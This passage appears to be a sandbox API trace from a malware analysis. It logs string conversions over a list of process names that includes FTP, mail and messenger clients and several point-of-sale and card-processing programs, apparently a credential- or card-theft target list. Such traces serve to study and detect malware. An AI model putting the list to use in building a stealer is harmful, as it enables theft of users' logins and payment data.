lpWideCharStr="icq.exetifierpro.exexey.exe£lj") returned 7 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="leechftp.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="leechftp.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 12 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="leechftp.exerpro.exexey.exe£lj") returned 12 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ncftp.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ncftp.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 9 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="ncftp.exeexerpro.exexey.exe£lj") returned 9 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="notepad.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.951] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="notepad.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 11 [0288.951] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="notepad.exeerpro.exexey.exe£lj") returned 11 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="operamail.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="operamail.exe", cchWideChar=13, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 13 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="operamail.exepro.exexey.exe£lj") returned 13 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="outlook.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="outlook.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 11 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="outlook.exexepro.exexey.exe£lj") returned 11 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="pidgin.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="pidgin.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 10 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="pidgin.exeexepro.exexey.exe£lj") returned 10 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="scriptftp.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="scriptftp.exe", cchWideChar=13, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 13 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=13, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="scriptftp.exepro.exexey.exe£lj") returned 13 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="skype.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="skype.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 9 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="skype.exe.exepro.exexey.exe£lj") returned 9 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="smartftp.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="smartftp.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 12 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="smartftp.exeepro.exexey.exe£lj") returned 12 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="thunderbird.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="thunderbird.exe", cchWideChar=15, lpMultiByteStr=0xa11f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 15 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=15, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="thunderbird.exeo.exexey.exe£lj") returned 15 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="trillian.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.952] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="trillian.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 12 [0288.952] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="trillian.exeexeo.exexey.exe£lj") returned 12 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="webdrive.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="webdrive.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 12 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="webdrive.exeexeo.exexey.exe£lj") returned 12 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="whatsapp.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="whatsapp.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 12 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="whatsapp.exeexeo.exexey.exe£lj") returned 12 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="winscp.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="winscp.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 10 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="winscp.exexeexeo.exexey.exe£lj") returned 10 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="yahoomessenger.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="yahoomessenger.exe", cchWideChar=18, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 18 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=18, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="yahoomessenger.exexexey.exe£lj") returned 18 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="active-charge.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="active-charge.exe", cchWideChar=17, lpMultiByteStr=0xa11f0c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 17 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=17, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="active-charge.exeexexey.exe£lj") returned 17 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="accupos.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="accupos.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 11 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="accupos.exege.exeexexey.exe£lj") returned 11 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="afr38.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="afr38.exe", cchWideChar=9, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 9 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=9, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="afr38.exexege.exeexexey.exe£lj") returned 9 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="aldelo.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="aldelo.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 10 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="aldelo.exeege.exeexexey.exe£lj") returned 10 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ccv_server.exe", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ccv_server.exe", cchWideChar=14, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 14 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=14, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="ccv_server.exeexeexexey.exe£lj") returned 14 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="centralcreditcard.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0288.953] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="centralcreditcard.exe", cchWideChar=21, lpMultiByteStr=0xa11f0c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 21 [0288.953] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=21, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="centralcreditcard.exeey.exe£lj") returned 21 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="creditservice.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="creditservice.exe", cchWideChar=17, lpMultiByteStr=0xa11f0c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 17 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=17, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="creditservice.exe.exeey.exe£lj") returned 17 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="edcsvr.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="edcsvr.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 10 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="edcsvr.exeice.exe.exeey.exe£lj") returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="fpos.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="fpos.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 8 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="fpos.exexeice.exe.exeey.exe£lj") returned 8 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="isspos.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="isspos.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 10 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="isspos.exeice.exe.exeey.exe£lj") returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mxslipstream.exe", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mxslipstream.exe", cchWideChar=16, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 16 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=16, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="mxslipstream.exee.exeey.exe£lj") returned 16 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="omnipos.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="omnipos.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 11 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="omnipos.exem.exee.exeey.exe£lj") returned 11 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spcwin.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spcwin.exe", cchWideChar=10, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 10 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=10, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="spcwin.exeem.exee.exeey.exe£lj") returned 10 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spgagentservice.exe", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="spgagentservice.exe", cchWideChar=19, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 19 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=19, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="spgagentservice.exexeey.exe£lj") returned 19 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="utg2.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="utg2.exe", cchWideChar=8, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 8 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=8, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="utg2.exeservice.exexeey.exe£lj") returned 8 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="through recognize.exe", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0288.954] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="through recognize.exe", cchWideChar=21, lpMultiByteStr=0xa11f0c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="through recognize.exe", lpUsedDefaultChar=0x0) returned 21 [0288.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=21, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="through recognize.exeey.exe£lj") returned 21 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=12, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: lpWideCharStr="WmiPrvSE.exegnize.exeey.exe£lj") returned 12 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0288.955] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11 [0288.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0xa11f0c, cbMultiByte=11, lpWideCharStr=0x18ed08, cchWideChar=2047 | out: 